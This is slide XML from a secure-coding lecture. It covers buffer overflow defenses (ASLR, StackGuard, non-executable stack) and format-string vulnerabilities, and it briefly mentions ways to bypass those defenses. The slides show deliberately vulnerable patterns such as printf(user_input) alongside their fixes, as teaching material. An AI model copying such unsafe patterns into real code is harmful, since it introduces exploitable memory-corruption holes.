            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Replace static arrays with STL (Standard Template Library) container</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use analysis tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Platform level:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ARLS (Address Space Layout Randomization ) - OS level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stack protection - Compiler</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Non Executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> stack and heap - hardware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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ASLR</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>andomize stack location, so it is hard to guess ebp and hard to guess the malicious code address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo sysctl -w kernel.randomize_va_space=2</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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Try brute force to defeat it. Run the vulnerable code many times. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="353" name="Google Shape;353;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376213" y="2306750"/>
            <a:ext cx="6080175" cy="2676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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Stack Guard</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="3961800" cy="3693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Compiler inserts a secret value into the stack and if the value is changed due to buffer overflow, the program exists without returning. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Different ways to bypass the guard, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cs.purdue.edu/homes/xyzhang/spring07/Papers/defeat-stackguard.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="360" name="Google Shape;360;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4559613" y="1083950"/>
            <a:ext cx="3819525" cy="3276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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Non-executable Stack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Google Shape;366;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="799550"/>
            <a:ext cx="8520600" cy="3693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NX bit, standing for No-eXecute feature in CPU separates code from data which marks certain areas of the memory as non-executable.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This countermeasure can be defeated using a different technique called Return-to-libc attack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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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4" name="Google Shape;74;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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Definition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> input overflows a buffer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Type: stack overflow, heap overflow, format string, ...</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Consequences: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>crash, or gain control of app, or gain complete control, </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>worm, rootkit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Target: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Low level languages (C, C++, Objective-C ...)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="242729"/>
              </a:buClr>
              <a:buSzPts val="1150"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>High level languages (e.g. Java, .NET, PhP, Python, Perl, ) can be affected indirectly </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="242729"/>
              </a:buClr>
              <a:buSzPts val="1150"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>When you call native code or use external programs/extensions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="242729"/>
              </a:buClr>
              <a:buSzPts val="1150"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In the VM itself (usually written in C++)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-301625" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="242729"/>
              </a:buClr>
              <a:buSzPts val="1150"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The interpreter or compiler do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>not work correctly (e.g. Java bytecode mandated bounds checks)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Security principles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>violated</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Minimum Trust</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Separation of duty (separate code from data)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Format String</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Google Shape;372;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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Format string is used to format data for display or storage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Unvalidated format string from input can cause memory corruption (buffer overflow problem)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: the printf() family functions take a variable number of arguments by specifying an ellipsis (...) as the last argument. (printf(“id: %d, name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: %s\n”, id, name);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sin Patterns: no explicit format string assigned. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>printf(user_input);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>fprintf(STDOUT, user_input)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>fprintf(STDOUT, msg_format, arg1, arg2);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Redemption: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>never pass u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>er input directly to a formatting function (e.g.  printf, sprintf, fprintf, vprintf, scanf, vfscanf) and handle it at every level. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Never read format strings from untrusted place.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>printf(“%s”, user_input);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="16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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Format String </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Google Shape;378;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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Exploits example and countering tools:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="379" name="Google Shape;379;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="876325" y="1332850"/>
            <a:ext cx="5444923" cy="3235900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Google Shape;380;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748050" y="4568750"/>
            <a:ext cx="73365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From “FormatGuard: Automatic Protection From printf Format String Vulnerabilities” by Crispin Cowan, Matt Barringer, Steve Beattie, and Greg Kroah-Hartman, USENIX2001</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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Format String </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Google Shape;386;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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Helpful Compiler options</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wall, Wformat, Wno-format-extra-args, Wformat-nonliteral, Wformat-security, Wformat=2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Testing:</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pass formatting specifiers into the application and see if hexadecimal values are returned. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exercise:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Find format-string vulnerabilities in CVE </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="16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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Stack Layout</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Google Shape;392;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="369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93" name="Google Shape;393;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="502425" y="1412100"/>
            <a:ext cx="4267200" cy="1246200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="394" name="Google Shape;394;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4912902" y="1166152"/>
            <a:ext cx="3460750" cy="2555125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
